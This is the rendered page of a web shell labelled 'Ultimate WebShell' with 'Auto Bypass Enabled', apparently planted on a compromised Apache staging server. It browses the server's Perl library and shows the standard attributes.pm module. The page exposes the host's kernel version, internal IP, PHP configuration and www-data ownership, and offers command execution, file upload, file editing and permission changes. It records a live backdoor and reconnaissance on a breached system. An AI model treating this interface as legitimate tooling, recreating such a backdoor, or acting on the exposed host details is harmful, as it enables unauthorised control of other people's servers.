WebShell Manager
Linux Stag-Enterprise-Staging-20-04 5.11.0-1019-aws #20~20.04.1-Ubuntu SMP Tue Sep 21 10:40:39 UTC 2021 x86_64
Apache
Server: 172.31.9.152
Your IP: 216.73.216.254
System Info
HOME
snap
core
17292
usr
lib
x86_64-linux-gnu
perl-base
Command Execution
Execute
File Upload
Upload
New Folder
New File
Name
Type
Size
Permissions
Modified
Actions
..
Parent
-
drwxr-xr-x
2026-02-25 16:32:53
-
Carp
Folder
-
0755
2026-02-25 16:32:52
Exporter
Folder
-
0755
2026-02-25 16:32:52
File
Folder
-
0755
2026-02-25 16:32:53
Getopt
Folder
-
0755
2026-02-25 16:32:52
Hash
Folder
-
0755
2026-02-25 16:32:53
IO
Folder
-
0755
2026-02-25 16:32:53
IPC
Folder
-
0755
2026-02-25 16:32:52
List
Folder
-
0755
2026-02-25 16:32:53
Scalar
Folder
-
0755
2026-02-25 16:32:52
Text
Folder
-
0755
2026-02-25 16:32:53
Tie
Folder
-
0755
2026-02-25 16:32:53
auto
Folder
-
0755
2026-02-25 16:32:52
unicore
Folder
-
0755
2026-02-25 16:32:52
warnings
Folder
-
0755
2026-02-25 16:32:52
AutoLoader.pm
File
5.36 KB
0644
2023-05-23 17:16:56
Carp.pm
File
19.6 KB
0644
2023-05-23 17:16:56
Config.pm
File
3.25 KB
0644
2023-05-23 17:16:56
Config_git.pl
File
409 B
0644
2023-05-23 17:16:56
Config_heavy.pl
File
48.62 KB
0644
2023-05-23 17:16:56
Cwd.pm
File
18.27 KB
0644
2023-05-23 17:16:56
DynaLoader.pm
File
10.5 KB
0644
2023-05-23 17:16:56
Errno.pm
File
4.77 KB
0644
2023-05-23 17:16:56
Exporter.pm
File
2.31 KB
0644
2023-05-23 17:16:56
Fcntl.pm
File
2.11 KB
0644
2023-05-23 17:16:56
FileHandle.pm
File
2.06 KB
0644
2023-05-23 17:16:56
IO.pm
File
413 B
0644
2023-05-23 17:16:56
POSIX.pm
File
17.58 KB
0644
2023-05-23 17:16:56
SelectSaver.pm
File
344 B
0644
2023-05-23 17:16:56
Socket.pm
File
13.15 KB
0644
2023-05-23 17:16:56
Symbol.pm
File
2.05 KB
0644
2023-05-23 17:16:56
XSLoader.pm
File
3.95 KB
0644
2023-05-23 17:16:56
attributes.pm
File
2.95 KB
0644
2023-05-23 17:16:56
base.pm
File
5.21 KB
0644
2023-05-23 17:16:56
bytes.pm
File
447 B
0644
2023-05-23 17:16:56
bytes_heavy.pl
File
758 B
0644
2023-05-23 17:16:56
constant.pm
File
5.6 KB
0644
2023-05-23 17:16:56
feature.pm
File
4.08 KB
0644
2023-05-23 17:16:56
fields.pm
File
4.87 KB
0644
2023-05-23 17:16:56
integer.pm
File
172 B
0644
2023-05-23 17:16:56
lib.pm
File
2.23 KB
0644
2023-05-23 17:16:56
locale.pm
File
2.81 KB
0644
2023-05-23 17:16:56
overload.pm
File
4.36 KB
0644
2023-05-23 17:16:56
overloading.pm
File
964 B
0644
2023-05-23 17:16:56
parent.pm
File
607 B
0644
2023-05-23 17:16:56
re.pm
File
8.44 KB
0644
2023-05-23 17:16:56
strict.pm
File
1.48 KB
0644
2023-05-23 17:16:56
utf8.pm
File
342 B
0644
2023-05-23 17:16:56
utf8_heavy.pl
File
31.25 KB
0644
2023-05-23 17:16:56
vars.pm
File
1.12 KB
0644
2023-05-23 17:16:56
warnings.pm
File
21.49 KB
0644
2023-05-23 17:16:56
0
items selected
Choose Action...
Delete Selected
Zip Selected
Unzip Selected
Execute Action
Clear Selection
© Ultimate WebShell | Auto Bypass Enabled
Create New Folder
Create New File
Edit File: attributes.pm
package attributes; our $VERSION = 0.27; @EXPORT_OK = qw(get reftype); @EXPORT = (); %EXPORT_TAGS = (ALL => [@EXPORT, @EXPORT_OK]); use strict; sub croak { require Carp; goto &Carp::croak; } sub carp { require Carp; goto &Carp::carp; } my %deprecated; $deprecated{CODE} = qr/\A-?(locked)\z/; $deprecated{ARRAY} = $deprecated{HASH} = $deprecated{SCALAR} = qr/\A-?(unique)\z/; my %msg = ( lvalue => 'lvalue attribute applied to already-defined subroutine', -lvalue => 'lvalue attribute removed from already-defined subroutine', const => 'Useless use of attribute "const"', ); sub _modify_attrs_and_deprecate { my $svtype = shift; # Now that we've removed handling of locked from the XS code, we need to # remove it here, else it ends up in @badattrs. (If we do the deprecation in # XS, we can't control the warning based on *our* caller's lexical settings, # and the warned line is in this package) grep { $deprecated{$svtype} && /$deprecated{$svtype}/ ? do { require warnings; warnings::warnif('deprecated', "Attribute \"$1\" is deprecated"); 0; } : $svtype eq 'CODE' && exists $msg{$_} ? do { require warnings; warnings::warnif( 'misc', $msg{$_} ); 0; } : 1 } _modify_attrs(@_); } sub import { @_ > 2 && ref $_[2] or do { require Exporter; goto &Exporter::import; }; my (undef,$home_stash,$svref,@attrs) = @_; my $svtype = uc reftype($svref); my $pkgmeth; $pkgmeth = UNIVERSAL::can($home_stash, "MODIFY_${svtype}_ATTRIBUTES") if defined $home_stash && $home_stash ne ''; my @badattrs; if ($pkgmeth) { my @pkgattrs = _modify_attrs_and_deprecate($svtype, $svref, @attrs); @badattrs = $pkgmeth->($home_stash, $svref, @pkgattrs); if (!@badattrs && @pkgattrs) { require warnings; return unless warnings::enabled('reserved'); @pkgattrs = grep { m/\A[[:lower:]]+(?:\z|\()/ } @pkgattrs; if (@pkgattrs) { for my $attr (@pkgattrs) { $attr =~ s/\(.+\z//s; } my $s = ((@pkgattrs == 1) ? '' : 's'); carp "$svtype package attribute$s " . "may clash with future reserved word$s: " . join(' : ' , @pkgattrs); } } } else { @badattrs = _modify_attrs_and_deprecate($svtype, $svref, @attrs); } if (@badattrs) { croak "Invalid $svtype attribute" . (( @badattrs == 1 ) ? '' : 's') . ": " . join(' : ', @badattrs); } } sub get ($) { @_ == 1 && ref $_[0] or croak 'Usage: '.__PACKAGE__.'::get $ref'; my $svref = shift; my $svtype = uc reftype($svref); my $stash = _guess_stash($svref); $stash = caller unless defined $stash; my $pkgmeth; $pkgmeth = UNIVERSAL::can($stash, "FETCH_${svtype}_ATTRIBUTES") if defined $stash && $stash ne ''; return $pkgmeth ? (_fetch_attrs($svref), $pkgmeth->($stash, $svref)) : (_fetch_attrs($svref)) ; } sub require_version { goto &UNIVERSAL::VERSION } require XSLoader; XSLoader::load(); 1; __END__ #The POD goes here
Rename
Change Permissions
Common permissions: 755 (rwxr-xr-x), 644 (rw-r--r--), 777 (rwxrwxrwx)
System Information
Uname: Linux Stag-Enterprise-Staging-20-04 5.11.0-1019-aws #20~20.04.1-Ubuntu SMP Tue Sep 21 10:40:39 UTC 2021 x86_64 Software: Apache PHP Version: 7.4.3-4ubuntu2.29 Protocol: HTTP/1.1 Server IP: 172.31.9.152 Your IP: 216.73.216.254 Mail: ON Curl: ON Owner: www-data MySQL: ON Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, Auto Bypass: ENABLED